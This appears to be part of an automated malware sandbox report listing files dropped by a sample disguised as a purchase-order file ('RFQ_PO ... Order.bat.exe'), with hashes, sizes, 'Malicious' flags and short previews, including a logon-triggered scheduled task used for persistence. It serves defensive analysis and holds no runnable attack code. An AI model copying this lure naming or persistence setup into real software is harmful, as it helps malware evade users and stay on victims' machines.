Entropy (8bit):5.44116704203802
Encrypted:false
SSDEEP:24576:/WKntIfGp9sqjnhMgeiCl7G0nehbGZpbD:+8Ie3Dmg27RnWGj
MD5:97E06E4C368D07B1EA8893369B753049
SHA1:72A5ACDCBBF49280D99036AC3896E5297EB44EB3
SHA-256:9CCA700422CD4F797345A8B042ACE94A79EE728EAA75A9A918F5F0908C776E74
SHA-512:C75CBB790504C587041F291E5BA888A0CF52E4640588B24B5EF05D06298F61B94E305EE1C183EB7DDDBC3ED7849602A69BEF47E60A9FB318976E01FB33098334
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1185280
Entropy (8bit):5.10330432782649
Encrypted:false
SSDEEP:12288:8IhTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9TsqjnhMgeiCl7G0nehbGZpbD
MD5:FCEAC56ED8FC7DFCEE437DF7F293511A
SHA1:5241679054BBE21F5E13254199696BE235A0E3B1
SHA-256:D87C08C920F09A4A38CD7DB6ECA239400381AD381F52CF579BDC71A4C25DACB8
SHA-512:6B4C23B50DFC09203F06609BEEDD1763F7AAC6A7032F8F701B3F0DA7A423EE026E85E05E032732D8850341142592D44A8AF002F201580891FD4E9EB028669455
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1531904
Entropy (8bit):5.421216162529223
Encrypted:false
SSDEEP:24576:l8oREwt2ioQ3J+RCsqjnhMgeiCl7G0nehbGZpbD:l8oRpoFGDmg27RnWGj
MD5:F58D6EEF9AA0EC05244351083C11EE60
SHA1:46F606512ADB873880D46F45D86F1A38A6C2E2B5
SHA-256:1812A471F6052EAA7B8429EE94924229385A87288FD5537F271210EFB7983228
SHA-512:A964AACC076487709294A4D6B4E83DBEC8FD6E802A26920F7144FFF2F6DD73A46477F4C5CFCC5C68FD47338F48832F67126633C4D7175E8AA8C58DD8C9C81BCA
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1341952
Entropy (8bit):5.238621641138607
Encrypted:false
SSDEEP:24576:Cf8HQlDMxHwJ07wCsqjnhMgeiCl7G0nehbGZpbD:CkHQlqwJ0xDmg27RnWGj
MD5:9856CF8F35D23AD1DD1E0E4FCF802549
SHA1:E2E83B61D9FF2D6E43543E602438671E3DC311B9
SHA-256:7288AF1FB11BB28FB21226B1B3585F080056E7E20843D13D695F6DD88FCB4C85
SHA-512:63B86663D0E3555CB338A9052C5ABE41D77947CFBB00DD089986B6A5F31AC4AF0E4EF51C0C7167F8C396FA62C6DF4F937138A3F42D2F7D2F198867FDED845B5B
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1534464
Entropy (8bit):7.124625010806751
Encrypted:false
SSDEEP:24576:aSEmYD6gjGPG45QVDkfXplyTyNsqjnhMgeiCl7G0nehbGZpbD:a5mYD6g2GWQVQf3yTqDmg27RnWGj
MD5:D9662B59E9C99542FF0D0C7FB61C2935
SHA1:ECD14D1A830C147D12DA2BA145120149F99A20CD
SHA-256:E9FBE9A61769DF9ED868CCAC50BB9C3DD92253134FBF7CAD0A6FE03AAFC599FD
SHA-512:8D03F7FD51A27E8371E01C544C4062B7C7BCED320326AD904FCD1E7207D7A043718ACA575BBBA62F4A0B261B206892AE6A18F73E14EED7F0413567D92766B7B9
Malicious:true
Reputation:unknown
Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:true
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                    Entropy (8bit):5.380192968514367
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                    MD5:E3EC01FAB7E327602A9550342FA73464
                                                                                                                                                                    SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                                                                                                                                                    SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                                                                                                                                                    SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                    Entropy (8bit):5.132036104753838
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/2xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/6v
                                                                                                                                                                    MD5:C984BEFE498CDADCCDC15ABA7BC8B66A
                                                                                                                                                                    SHA1:23BB5ADCD1F9D71C4F3005E3ECBAD80464D31F9C
                                                                                                                                                                    SHA-256:2B73D1DC70BFCF7C57D8E980F87778B21398C9A8EAB72FB0F54C8967FEEBD0D4
                                                                                                                                                                    SHA-512:3E54670FDC5D5253A2DDBFB43FC5E6223E5122C6F46AB22BB9FBA93C1DC6729ED5BC9D481EF99107494321B3DA39176BA40FC2636A4F7460222EE90C04949364
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                    Entropy (8bit):5.132036104753838
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/2xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/6v
                                                                                                                                                                    MD5:C984BEFE498CDADCCDC15ABA7BC8B66A
                                                                                                                                                                    SHA1:23BB5ADCD1F9D71C4F3005E3ECBAD80464D31F9C
                                                                                                                                                                    SHA-256:2B73D1DC70BFCF7C57D8E980F87778B21398C9A8EAB72FB0F54C8967FEEBD0D4
                                                                                                                                                                    SHA-512:3E54670FDC5D5253A2DDBFB43FC5E6223E5122C6F46AB22BB9FBA93C1DC6729ED5BC9D481EF99107494321B3DA39176BA40FC2636A4F7460222EE90C04949364
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1432064
                                                                                                                                                                    Entropy (8bit):7.884290221622837
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:y1zGUxjCMfFrJirFpgEZR4IGqiHVtAgjSN9/pggC0gPAMhCKqX:0L/9QrF/ZR4DH4/begC0WAfZ
                                                                                                                                                                    MD5:06C13587E9A7AF60860CB6E2C4F3A7B2
                                                                                                                                                                    SHA1:238F5DDCD0193ABA7B760B7AB6F3F982D73383B5
                                                                                                                                                                    SHA-256:EFD64C0B88BBE45461D13B2A0ACD9544218F819F4579AF35B5FC92E20D5F6FA5
                                                                                                                                                                    SHA-512:B9254B49E477E7D60F077EC17EA2DEE374D06C6AC095F1B70797D56FA523729B2F23CF9C5810972C515EA7D4D15923314B93DA8B50A2AAF494D6133474CB6C8E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[binary PE content, raw dump omitted]
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                    Entropy (8bit):7.9868677280959055
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:eeneNWE0RTZ1NK0qQ86KX1MYKsJmvBoDYN:Dn4ART3NdI6KXRmvBJ
                                                                                                                                                                    MD5:F8E8BF36549FC3A571B072799A02E8A2
                                                                                                                                                                    SHA1:C66717DADD780D29AA0924E69F1B5F939179C5F2
                                                                                                                                                                    SHA-256:96C21A8736C0C23721E055FA26B9DD19C07AFECA4C758B2F890550F3DA43ACA7
                                                                                                                                                                    SHA-512:7518139933AA29F29DAF84C5839012FFED9B7F44471FA2E8F78E84A40B5A1D71217BFA722F45FA0F52554BAFF0D25FA9519E32A267C9A77621DFF619E72A4BBB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[high-entropy binary data, raw dump omitted]
                                                                                                                                                                    Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):2313
                                                                                                                                                                    Entropy (8bit):5.140649080370946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm5g
                                                                                                                                                                    MD5:CE2E062A75DF6B552BD792CF52264FD0
                                                                                                                                                                    SHA1:ED61E3499CA9469291491F98FE9AA79DB51E2F32
                                                                                                                                                                    SHA-256:B3060932AA321586168268C28AACB7688CEBFF2B711F20185934CDA11CD75C71
                                                                                                                                                                    SHA-512:2A69CB50B64FD9B6EEFF26318450909D125B17E30DE9B0BA88575E230A8871FE06B3C6B1DC0E442A7414939B08C8A8D205DC926C5672ECB386737EF8E7717A9E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                                    Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                    File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\212\276<V"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                    Entropy (8bit):0.6154529736156096
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:Rzt/PwUTIBQjfLYreaHT9TPHkzs9zsHzzbFPR://Pw3bhT9TfCPR
                                                                                                                                                                    MD5:AD8EE3E549E980E1346A838F158B2215
                                                                                                                                                                    SHA1:5359715C4CB2B8C22E25DB7B4DB1F09034BD35F2
                                                                                                                                                                    SHA-256:A8D41B8EAC60FA36CCC708DF7E8922D5E82740D2CAFBFCAC936E02BA68F37224
                                                                                                                                                                    SHA-512:AAD26E1AAC67C8E657B51011C9305D6F595DD54E546A13C9045A797E82419A480765B4A2E4F97A8283C6ED2B45EBA073E4F2778B2ACD4431E7A32FA84BE9B2CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[binary log/database content, raw dump omitted]
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1150976
                                                                                                                                                                    Entropy (8bit):5.038933839637317
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:rIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:3A2A9E48FBD06CF338FA403E33134177
                                                                                                                                                                    SHA1:942DEDBCD73E11B5E08C7361C9191783D7498346
                                                                                                                                                                    SHA-256:9D4FE4951FB85EE77B26E1F68B0D5191E0BB1EA653124681419F425FB38FB104
                                                                                                                                                                    SHA-512:4FA5CDCF5173E30EC43BF11B379DE535218612597AEF547200A07F3EBEBDBA4D5ACC01FCEEFB5D55E761B6326BA82B423FD6CE279180CF242035BCA810474DD5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[binary PE content, raw dump omitted]
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):6.97434228252868
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:ZwVFr68Vw9wn/6h8N1zidlDmg27RnWGj:ZwVFrssC/dlD527BWG
                                                                                                                                                                    MD5:E46CE79404D95E10B788E99FB6C2C36E
                                                                                                                                                                    SHA1:5FB155B8727FD3A969E415CD38138E85CC6ED556
                                                                                                                                                                    SHA-256:D8C3940515AF9EEB847ADA3E3F8DFD20AB2326187A3EE19BCB2A12727B3A2799
                                                                                                                                                                    SHA-512:541E3D9604B53A8C8507CD3BD1456C547F82B08F19077504A5D9FC2D1F8CC2D726FB28CFE952C5CA8E149A5A9704ACFA3CA945786D07BCE361CEF9CC8B06FC22
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                    Entropy (8bit):7.253771868247366
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:kQW4qoNUgslKNX0Ip0MgHCpoMBOuQsqjnhMgeiCl7G0nehbGZpbD:kQW9BKNX0IPgiKMBOuMDmg27RnWGj
                                                                                                                                                                    MD5:A402C4C181FB483490A130C24E7F84A6
                                                                                                                                                                    SHA1:6B320030BBACE4116AFD9E0F6F9D5BAB18FAA850
                                                                                                                                                                    SHA-256:B32F3E4A48BD808EEE53DC043CAF4D21DDF229B194D2F93E85126ED94124694F
                                                                                                                                                                    SHA-512:7D3D996D921B52F9006490FA50D2078F1ECAC1BF4786819B3ECE1AFEC7EB61F104EFBE52DF9621B25FE584841AE275BBFA2892AECEF09AB85862B31C84BDBC68
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                    Entropy (8bit):5.163579152223823
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:d2G7AbHjkrsqjnhMgeiCl7G0nehbGZpbD:d2G7AbHjiDmg27RnWGj
                                                                                                                                                                    MD5:3A37B3D9FCF2C4F66FB6C645448A80F4
                                                                                                                                                                    SHA1:A110CCC8AA902368BB037B69FFAD10A8DE459004
                                                                                                                                                                    SHA-256:4AE75812953445C0F1054A50C699CCD35977DFE04128B53CD869A9778E960AAC
                                                                                                                                                                    SHA-512:EE2258498953EE1EEC89586C2E0E1F25D657F769F16FB88B4E086FD45636176E1DB8FDC09B95EC619ABA57086E4D1249ACE3C6753A513B2ED64AA1D5DD727089
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                    Entropy (8bit):7.288974667711691
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:SkdpSI+K3S/GWei+qNv2uG3jsqjnhMgeiCl7G0nehbGZpbD:S6SIGGWei2uG3nDmg27RnWGj
                                                                                                                                                                    MD5:B184A2D21BE1424241C0CC6F3EE4C667
                                                                                                                                                                    SHA1:F3E1CDB6D6A378991EB9CE83F5485756C4C683D8
                                                                                                                                                                    SHA-256:A4DDD6434168052FB502E71F406596A82BEB3D201E2F1D0923F7E23D66ADB0A6
                                                                                                                                                                    SHA-512:26C774B51C4F4AC5D86B8502B16CAFA38225BF89F158A1EF176EDBF46F03069DCA10CDF2E03FAA2ABF369AA14ECDC03636CAE052A113771DFE56C702ADCE37E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1141248
                                                                                                                                                                    Entropy (8bit):5.017543260360941
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:tsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E970472BE732DDA93E40BA89E643BD45
                                                                                                                                                                    SHA1:37BE17EDCC1A249F7A021AB932315633315A88DC
                                                                                                                                                                    SHA-256:77111BA31141F997A201E20A3D351381743D0FBBB21FB227816876140194B321
                                                                                                                                                                    SHA-512:FA23628F1023C27379E86427B363A711DDF155BD725842BE2836A007CFDB64E3B62E90559EEE6DCDB79B9017445A348ED17EC766954297242C7B5DC53AA1FF26
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.32210892747388087
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:gLWjt8ta/k/uMclF6vMclFq5zrwJ1z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+Gerr:HZ80kqF69Fq5zrwM6CzE5Z2+fqjFf
                                                                                                                                                                    MD5:22BA9B7AA7AA6436BB60EA342C438F6A
                                                                                                                                                                    SHA1:8AD00DB3262164A513822F360D2AAC98F3D4BA17
                                                                                                                                                                    SHA-256:EA600441EB2D7C252DC2250D30DD01462EAB3867FF034B15D961AE7DF9B3E243
                                                                                                                                                                    SHA-512:D40DB53BADED95EFEF922F61D0EDD98457771EC195F8E96E43DC763A7A1DAEA92E151AB5DB709512042689265A8E32F712300D6676F5CD525AB446753D556C6C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1511424
                                                                                                                                                                    Entropy (8bit):5.222923084007445
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:4ObHA4LWOsvAYFTbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:VjL3UTbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:D09CFE9983E805B17E25ED1928A06826
                                                                                                                                                                    SHA1:0930569603B3A793EEB28805D9E17428E9A822F9
                                                                                                                                                                    SHA-256:2B0F27CE6F63C142E61C9B503F255B325231B8F9544132376DC9F59DAE752332
